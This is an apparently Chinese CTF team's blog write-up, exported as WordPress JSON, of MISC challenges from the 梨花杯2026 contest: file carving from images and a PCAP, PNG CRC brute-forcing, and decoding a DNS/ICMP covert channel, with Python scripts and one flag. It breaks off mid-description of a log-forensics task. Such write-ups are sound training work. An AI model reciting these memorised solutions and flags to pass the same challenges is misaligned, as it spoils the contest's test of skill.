{"id":1416,"date":"2026-05-17T16:46:09","date_gmt":"2026-05-17T08:46:09","guid":{"rendered":"http:\/\/shr1mp.top\/?p=1416"},"modified":"2026-05-19T18:44:25","modified_gmt":"2026-05-19T10:44:25","slug":"%e6%a2%a8%e8%8a%b1%e6%9d%af2026","status":"publish","type":"post","link":"https:\/\/shr1mp.top\/index.php\/2026\/05\/17\/%e6%a2%a8%e8%8a%b1%e6%9d%af2026\/","title":{"rendered":"\u68a8\u82b1\u676f2026"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">\u961f\u540d\uff1a\u7f51\u5b89\u4e0d\u80fd\u5931\u53bb\u4e8c\u680b\uff083\u4e2a25\u5c0f\u767b\u4eec\u7684\u961f\u4f0d\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/16\/_20260516183217_771_201065204b6f9d587.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/16\/_20260516183217_771_201065204b6f9d587.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u672c\u4eba\u62ff\u4e86\u4e2aMISC\u76841\u4e2a\u4e8c\u8840\uff0c\u4e24\u4e2a\u4e09\u8840\uff0c\u961f\u4f0d\u603b\u6392\u540d\u7b2c\u4e09\u3002\u961f\u53cb\u6253\u74e6\uff0c\u540e\u53f0ai\u641e\u51fa\u6765\u4e2aWeb\u7684\u4e00\u8840\u96be\u9898\uff0c\u611f\u6168\u73b0\u5728\u90fd\u662fAI\u5927\u65f6\u4ee3\u4e86&#8230;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/16\/_20260516164849_765_21b9011b1ff9e6aa6.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/16\/_20260516164849_765_21b9011b1ff9e6aa6.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"misc\">MISC<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u5c3e\u5df4\u91cc\u7684\u538b\u7f29\u5305\">\u5c3e\u5df4\u91cc\u7684\u538b\u7f29\u5305<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u8fd9\u5f20\u56fe\u7247\u770b\u8d77\u6765\u5f88\u6b63\u5e38\uff0c\u4f46\u5b83\u7684\u201c\u5c3e\u5df4\u201d\u4f3c\u4e4e\u6709\u70b9\u591a\u4f59\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u62ff\u5230\u4e00\u4e2awebp\uff0c010\u6253\u5f00\u627e\u5230\u4e0b\u9762\u6709flag.txt\u5b57\u6837,<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-154112ffba462daadb3b94.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-154112ffba462daadb3b94.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u60f3\u5230\u6587\u4ef6\u91cc\u9762\u85cf\u4e86\u4e1c\u897f\uff0c\u7528foremost\u8fdb\u884c\u6587\u4ef6\u5206\u79bb<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">foremost\u63d0\u53d6\u51fa\u4e00\u4e2azip\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-154152261e7fae0f900dca.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-154152261e7fae0f900dca.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ca1\u6709\u52a0\u5bc6\uff0c\u6253\u5f00\u76f4\u63a5\u662fflag<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u4fdd\u5bc6\u4e3a\u4eba\u6c11-\u4fdd\u5bc6\u9760\u4eba\u6c11\">\u4fdd\u5bc6\u4e3a\u4eba\u6c11\uff0c\u4fdd\u5bc6\u9760\u4eba\u6c11<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u5185\u7f51\u5907\u4efd\u670d\u52a1\u5668\u51fa\u73b0\u4e86\u4e00\u6b21\u53ef\u7591\u7684\u6587\u4ef6\u4f20\u8f93\uff0c\u73b0\u573a\u53ea\u4fdd\u7559\u4e86\u4e00\u4efd\u6d41\u91cf\u5305\u3002 \u8bf7\u4ece PCAP \u4e2d\u8fd8\u539f\u88ab\u4f20\u8f93\u7684\u539f\u59cb\u6587\u4ef6\uff0c\u5e76\u4ece\u6587\u4ef6\u5185\u5bb9\u4e2d\u627e\u5230 flag\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ed9\u4e86\u4e00\u4e2a\u6d41\u91cf<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7528NetA\u5206\u7406\u51fa\u4e0b\u8f7d\u7684\u6587\u4ef6<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-1546574667b70917bacc18.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-1546574667b70917bacc18.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6587\u4ef6\u91cc\u9762\uff1aeviedence\\capture_notes\\flag.txt\u76f4\u63a5\u51faflag<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u4f60\u77e5\u9053crc\u5417\">\u4f60\u77e5\u9053CRC\u5417\uff1f<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u5e08\u5085\uff0c\u8fd9\u5f20 PNG \u56fe\u7247\u597d\u50cf\u574f\u4e86\u3002\u4fee\u597d\u5b83\uff0c\u627e\u5230\u9690\u85cf\u5728\u56fe\u7247\u4e2d\u7684 flag\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9053\u9898\u53ef\u4ee5\u7528PZ\u79d2,\u4f46\u662f\u672c\u6587\u9009\u62e9\u4e86\u4e00\u79cd\u504f\u672c\u8d28\u7684\u65b9\u6cd5<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u68c0\u67e5-png-\u6587\u4ef6\u7ed3\u6784\">1. \u68c0\u67e5 PNG \u6587\u4ef6\u7ed3\u6784<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">PNG \u6587\u4ef6\u7b7e\u540d (<code>89 50 4E 47 0D 0A 1A 0A<\/code>) \u6b63\u5e38\uff0c\u8bf4\u660e\u6587\u4ef6\u5934\u6ca1\u6709\u88ab\u7834\u574f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u89e3\u6790 chunk \u7ed3\u6784\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>Chunk<\/th><th>Length<\/th><th>CRC \u72b6\u6001<\/th><\/tr><\/thead><tbody><tr><td>IHDR<\/td><td>13<\/td><td><strong>MISMATCH<\/strong><\/td><\/tr><tr><td>IDAT<\/td><td>65536<\/td><td>OK<\/td><\/tr><tr><td>IDAT<\/td><td>65536<\/td><td>OK<\/td><\/tr><tr><td>IDAT<\/td><td>47357<\/td><td>OK<\/td><\/tr><tr><td>IEND<\/td><td>0<\/td><td>OK<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">IHDR \u6570\u636e\u5982\u4e0b\uff1a Width: 0x000001da = 474 Height: 0x0000017b = 379 Bit depth: 8 Color type: 2 (RGB)<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5f53\u524d\u6570\u636e\u8ba1\u7b97\u7684 CRC\uff1a<code>0xfac6ddb3<\/code><\/li>\n\n\n\n<li>\u6587\u4ef6\u4e2d\u5b58\u50a8\u7684 CRC\uff1a<code>0x7cfb886d<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">CRC \u4e0d\u5339\u914d\u3002IDAT\/IEND chunk \u7684 CRC \u5168\u90e8\u6b63\u786e\uff0c\u8bf4\u660e\u95ee\u9898\u4ec5\u51fa\u5728 IHDR \u4e0a\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u63a8\u6d4b-crc-\u662f\u539f\u6765\u7684-ihdr-\u6570\u636e\u88ab\u7be1\u6539\u8fc7\">2. \u63a8\u6d4b\uff1aCRC \u662f\u539f\u6765\u7684\uff0cIHDR \u6570\u636e\u88ab\u7be1\u6539\u8fc7<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u662f\u4e00\u79cd\u5e38\u89c1\u7684\u9690\u5199\/\u53d6\u8bc1\u624b\u6cd5\uff1a\u4fee\u6539 IHDR \u4e2d\u7684\u5bbd\u9ad8\uff08\u4f7f\u89e3\u7801\u5668\u53ea\u8bfb\u53d6\u56fe\u50cf\u7684\u4e00\u90e8\u5206\uff09\uff0c\u4f46\u4fdd\u7559\u539f\u59cb CRC \u4e0d\u53d8\u3002\u8fd9\u6837\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u56fe\u7247\u4ecd\u7136\u80fd\u6b63\u5e38\u663e\u793a\uff08\u4e0a\u534a\u90e8\u5206\uff09<\/li>\n\n\n\n<li>\u4f46\u56fe\u50cf\u4e0b\u534a\u90e8\u5206\u7684\u5185\u5bb9\u88ab\u300c\u9690\u85cf\u300d\u4e86<\/li>\n\n\n\n<li>\u539f\u59cb CRC \u53ef\u4ee5\u4f5c\u4e3a\u7ebf\u7d22\u6062\u590d\u771f\u5b9e\u7684\u5bbd\u9ad8<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"3-\u7206\u7834\u539f\u59cb\u5bbd\u9ad8\">3. \u7206\u7834\u539f\u59cb\u5bbd\u9ad8<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">CRC \u8ba1\u7b97\u8303\u56f4\u4e3a <code>chunk type (4 bytes) + chunk data (13 bytes)<\/code>\uff0c\u5176\u4e2d chunk type \u56fa\u5b9a\u4e3a <code>IHDR<\/code>\uff0cchunk data \u7684\u540e 5 \u5b57\u8282\u56fa\u5b9a\uff08bit depth=8, color type=2, compression=0, filter=0, interlace=0\uff09\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5199\u811a\u672c\u5728\u5408\u7406\u8303\u56f4\u5185\u7206\u7834\u5bbd\u9ad8\uff0c\u5bfb\u627e\u4f7f <code>CRC32(\"IHDR\" + width_bytes + height_bytes + \"\\x08\\x02\\x00\\x00\\x00\") == 0x7cfb886d<\/code> \u7684\u7ec4\u5408\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> import binascii, struct\n    target_crc = 0x7cfb886d\n    ihdr_type = b'IHDR'\n    fixed = bytes(&#91;0x08, 0x02, 0x00, 0x00, 0x00])  # bit_depth, color_type, compression, filter, interlace\n\n    for w in range(1, 4096):\n        wb = struct.pack('&gt;I', w)\n        for h in range(1, 4096):\n            hb = struct.pack('&gt;I', h)\n            crc = binascii.crc32(ihdr_type + wb + hb + fixed) &amp; 0xffffffff\n            if crc == target_crc:\n                print(f'FOUND: Width={w}, Height={h}')\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8f93\u51fa\uff1a <code>FOUND: Width=760, Height=560<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u539f\u59cb\u56fe\u7247\u5c3a\u5bf8\u4e3a 760\u00d7560<\/strong>\uff0c\u88ab\u7be1\u6539\u4e3a 474\u00d7379\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"4-\u4fee\u590d\u56fe\u7247\">4. \u4fee\u590d\u56fe\u7247<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c06 IHDR \u4e2d\u7684\u5bbd\u9ad8\u4fee\u6539\u4e3a 760\u00d7560\uff0c\u5e76\u91cd\u65b0\u8ba1\u7b97\u6b63\u786e\u7684 CRC \u5199\u5165\u6587\u4ef6\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    import struct, binascii\n    original_width = 760\n    original_height = 560\n\n    ihdr_data = struct.pack('&gt;IIBBBBB', original_width, original_height, 8, 2, 0, 0, 0)\n    new_crc = binascii.crc32(b'IHDR' + ihdr_data) &amp; 0xffffffff\n\n    # \u5c06\u4fee\u590d\u540e\u7684 IHDR \u6570\u636e\u548c CRC \u5199\u56de\u6587\u4ef6\u504f\u79fb\u5904\n    data&#91;16:29] = ihdr_data   # offset 16 = 8(sig) + 4(len) + 4(type)\n    data&#91;29:33] = struct.pack('&gt;I', new_crc)<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"5-\u83b7\u53d6-flag\">5. \u83b7\u53d6 Flag<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4fee\u590d\u540e\u56fe\u7247\u5c3a\u5bf8\u53d8\u4e3a 760\u00d7560\uff0c\u539f\u6765\u88ab\u9519\u8bef\u9ad8\u5ea6\u300c\u88c1\u6389\u300d\u7684\u4e0b\u534a\u90e8\u5206\uff08\u7b2c 380~560 \u884c\uff0c\u5171 181 \u884c\uff09\u91cd\u65b0\u663e\u793a\u51fa\u6765\uff0c<strong>flag \u76f4\u63a5\u5199\u5728\u56fe\u7247\u5e95\u90e8<\/strong>\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-1549489ef30a25a90b1e76.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/16\/-2026-05-16-1549489ef30a25a90b1e76.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">**\u672c\u9898\u8003\u5bdf\u5bf9 PNG \u6587\u4ef6\u683c\u5f0f\u7684\u7406\u89e3\u548c CRC32 \u6821\u9a8c\u673a\u5236\u7684\u5229\u7528\u3002\u6838\u5fc3\u77e5\u8bc6\u70b9\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>PNG IHDR chunk \u5305\u542b\u56fe\u7247\u5143\u4fe1\u606f\uff08\u5bbd\u3001\u9ad8\u3001\u4f4d\u6df1\u3001\u989c\u8272\u7c7b\u578b\u7b49\uff09\uff0c\u5171 13 \u5b57\u8282<\/li>\n\n\n\n<li>\u6bcf\u4e2a chunk \u672b\u5c3e 4 \u5b57\u8282\u4e3a CRC32 \u6821\u9a8c\u503c\uff08\u8ba1\u7b97\u8303\u56f4\uff1achunk type + chunk data\uff09<\/li>\n\n\n\n<li>\u4fee\u6539 IHDR \u5bbd\u9ad8\u53ef\u4ee5\u9690\u85cf\u56fe\u7247\u7684\u90e8\u5206\u533a\u57df\uff08\u7f29\u5c0f\u9ad8\u5ea6\u4f7f\u89e3\u7801\u5668\u63d0\u524d\u505c\u6b62\uff09<\/li>\n\n\n\n<li>\u4fdd\u7559\u539f\u59cb CRC \u53ef\u4ee5\u4f5c\u4e3a\u7ebf\u7d22\u9006\u5411\u6062\u590d\u539f\u59cb\u5bbd\u9ad8<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u7f51\u7edc\u5b89\u5168\u65e0\u5c0f\u4e8b\">\u7f51\u7edc\u5b89\u5168\u65e0\u5c0f\u4e8b<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u67d0\u7814\u53d1\u673a 10.10.7.23 \u5728\u591c\u95f4\u89e6\u53d1\u4e86\u201c\u5f02\u5e38\u5916\u8054\u5fc3\u8df3\u201d\u544a\u8b66\u3002\u5b89\u5168\u8bbe\u5907\u53ea\u4fdd\u7559\u4e86\u4e00\u5c0f\u6bb5\u6293\u5305\uff0c\u6b63\u5e38 DNS \u67e5\u8be2\u548c ICMP \u63a2\u6d4b\u6d41\u91cf\u4e2d\u4f3c\u4e4e\u6df7\u5165\u4e86\u67d0\u79cd\u9690\u853d\u4f20\u8f93\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">1500 \u5305 PCAP\uff0c\u6570\u636e\u7ecf\u53cc\u901a\u9053\u9690\u853d\u4f20\u8f93\uff1aDNS <code>lhgame.local<\/code> \u5b50\u57df\u540d\u627f\u8f7d\u5076\u6570\u5e8f\u5217\u5757\uff0cICMP Echo \u8bf7\u6c42 payload \u627f\u8f7d\u5947\u6570\u5e8f\u5217\u5757\u3002\u4ea4\u7ec7\u540e base32 \u89e3\u7801 \u2192 zlib \u89e3\u538b\u5f97 flag\u3002\u5176\u4f59 100 \u4e2a\u5e26\u7f16\u7801\u5b50\u57df\u540d\u7684\u6b63\u5e38 DNS \u67e5\u8be2\u4e3a\u63a9\u62a4\u6d41\u91cf\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u8bc6\u522b\u53cc\u901a\u9053\">1: \u8bc6\u522b\u53cc\u901a\u9053<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5206\u6790\u53d1\u73b0\u4e24\u7c7b\u5f02\u5e38\u6d41\u91cf\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>DNS \u67e5\u8be2<\/strong> <code>sNNN.XXXXXXXX.cdn-sync.lhgame.local<\/code> \u2014 \u5e8f\u5217\u53f7 s000, s002, s004, s006, s008, s010\uff08\u5076\u6570\uff09<\/li>\n\n\n\n<li><strong>ICMP Echo Request<\/strong> payload <code>ts=...;seq=NNN;data=XXXXXXXX;stat<\/code> \u2014 \u5e8f\u5217\u53f7 001, 003, 005, 007, 009\uff08\u5947\u6570\uff09<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u3010\u5947\u6570\u5076\u6570\u8fd9\u70b9\u5f88\u5173\u952e\uff0c\u5fd9\u6d3b\u4e86\u5f88\u4e45\u624d\u53d1\u73b0\u7684\u8fd9\u4e2a\u89c4\u5f8b\u3011<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e8c\u8005\u5e8f\u5217\u53f7\u4e92\u8865\uff0c\u7ec4\u6210\u5b8c\u6574 000-010\u3002\u6bcf\u4e2a data \u5b57\u6bb5\u4e3a 7-8 \u5b57\u7b26\u7684 base32 \u7f16\u7801\u5757\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u4ea4\u7ec7\u91cd\u7ec4\u4e0e\u89e3\u7801\">2: \u4ea4\u7ec7\u91cd\u7ec4\u4e0e\u89e3\u7801<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6309\u6570\u5b57\u5e8f\u5217\u53f7\u6392\u5e8f\u5408\u5e76\u6240\u6709 data \u5757\uff0cbase32 \u89e3\u7801\u540e zlib \u89e3\u538b\u5373\u5f97 flag\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    from scapy.all import *\n    import re, base64, zlib\n\n    packets = rdpcap('traffic.pcap')\n    all_chunks = &#91;]\n\n    # \u63d0\u53d6 DNS lhgame (\u5076\u6570\u5e8f\u5217)\n    for pkt in packets:\n        if DNS in pkt and pkt&#91;DNS].qd:\n            qname = pkt&#91;DNS].qd.qname.decode().lower().rstrip('.')\n            if 'lhgame' in qname:\n                parts = qname.split('.')\n                seq = int(parts&#91;0]&#91;1:])      # s000 -&gt; 0\n                data = parts&#91;1]\n                all_chunks.append((seq, data))\n\n    # \u63d0\u53d6 ICMP (\u5947\u6570\u5e8f\u5217)\n    for pkt in packets:\n        if ICMP in pkt and pkt&#91;ICMP].type == 8:\n            payload = bytes(pkt&#91;ICMP].payload).decode('ascii', errors='ignore')\n            m = re.search(r'seq=(\\d+);data=(&#91;a-z0-9]+);', payload)\n            if m:\n                all_chunks.append((int(m.group(1)), m.group(2)))\n\n    # \u53bb\u91cd\u3001\u6392\u5e8f\u3001\u5408\u5e76\n    seen = set()\n    unique = &#91;]\n    for seq, data in sorted(all_chunks):\n        if seq not in seen:\n            seen.add(seq)\n            unique.append(data)\n\n    combined = ''.join(unique)\n    decoded = base64.b32decode(combined.upper() + '=' * ((-len(combined)) % 8))\n    flag = zlib.decompress(decoded).decode()\n    print(flag)<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>LHFLAG{dns_icmp_mixed_covert_channel_7c9f2a}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u591c\u822a\u65e5\u5fd7\">\u591c\u822a\u65e5\u5fd7<\/h3>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/origin.picgo.net\/2026\/05\/19\/-2026-05-19-183310fb7ff637fcc8bb3f.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/origin.picgo.net\/2026\/05\/19\/-2026-05-19-183310fb7ff637fcc8bb3f.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><figcaption class=\"wp-element-caption\">\u8fd9\u91cc\u63a8\u8350\u4e0blovelyspark\uff0c\u8fd9\u4e2a\u5de5\u5177\u592a\u597d\u7528\u4e86<\/figcaption><\/figure>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u67d0\u4e1a\u52a1\u7684 prod-web-02 \u5728\u51cc\u6668\u51fa\u73b0\u77ed\u6682\u5f02\u5e38\u3002SOC \u53ea\u6253\u5305\u51fa\u4e86 4 \u4efd\u65e5\u5fd7\uff1aNginx \u8bbf\u95ee\u65e5\u5fd7\u3001\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u3001\u7cfb\u7edf\u8ba4\u8bc1\u65e5\u5fd7\u3001WAF \u65e5\u5fd7\u3002\u65e5\u5fd7\u91cf\u8f83\u5927\uff0c\u4e14\u5b58\u5728\u626b\u63cf\u5668\u566a\u58f0\u548c\u8bef\u62a5\u3002\u8bf7\u901a\u8fc7\u65f6\u95f4\u7ebf\u68b3\u7406\u3001IP \u5173\u8054\u3001\u5f02\u5e38\u884c\u4e3a\u68c0\u6d4b\u7b49\u65b9\u6cd5\uff0c\u8fd8\u539f\u653b\u51fb\u94fe\u5e76\u627e\u51fa flag\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bf4\u660e\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u65e5\u5fd7\u65f6\u95f4\u5747\u4e3a UTC+8\u3002<\/li>\n\n\n\n<li>flag \u683c\u5f0f\u4e3a LHFLAG{\u2026}\u3002<\/li>\n\n\n\n<li>\u9009\u624b\u53ea\u9700\u8981\u5206\u6790\u9644\u4ef6\u5185\u65e5\u5fd7\uff0c\u4e0d\u9700\u8981\u8054\u7f51\uff0c\u4e0d\u9700\u8981\u653b\u51fb\u4efb\u4f55\u771f\u5b9e\u670d\u52a1\u3002<\/li>\n\n\n\n<li>\u90e8\u5206\u5b57\u6bb5\u662f\u4e1a\u52a1\u4e3a\u4e86\u6392\u969c\u5199\u5165\u7684 forensic\/checkpoint \u4fe1\u606f\uff0c\u4f46\u53ea\u6709\u771f\u6b63\u653b\u51fb\u94fe\u4e0a\u7684\u7247\u6bb5\u80fd\u62fc\u51fa\u6b63\u786e flag\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u9644\u4ef6\u7ed3\u6784\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">logs\/access.log Nginx \u98ce\u683c\u8bbf\u95ee\u65e5\u5fd7<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">logs\/app.log JSON Lines 